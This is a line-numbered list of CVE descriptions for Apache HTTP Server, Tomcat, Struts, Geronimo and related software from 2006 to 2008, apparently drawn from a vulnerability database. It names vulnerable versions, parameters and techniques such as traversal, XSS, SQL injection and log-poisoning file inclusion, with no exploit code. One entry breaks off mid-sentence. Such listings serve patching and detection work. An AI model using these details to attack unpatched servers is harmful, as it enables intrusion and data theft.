| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
10600| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
10601| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
10602| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
10603| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
10604| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10605| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
10606| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
10607| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
10608| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
10609| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
10610| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
10611| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
10612| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
10613| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
10614| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
10615| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
10616| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
10617| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
10618| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
10619| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
10620| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
10621| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
10622| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
10623| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
10624| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
10625| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
10626| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
10627| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
10628| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
10629| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
10630| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
10631| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
10632| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
10633| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
10634| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
10635| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
10636| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
10637| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10638| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
10639| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
10640| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
10641| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
10642| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
10643| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
10644| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
10645| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
10646| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
10647| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
10648| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
10649| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
10650| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
10651| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10652| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
10653| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
10654| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
10655| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
10656| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
10657| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
10658| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
10659| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
10660| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
10661| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
10662| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
10663| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
10664| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
10665| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
10666| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
10667| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
10668| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10669| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
10670| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
10671| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
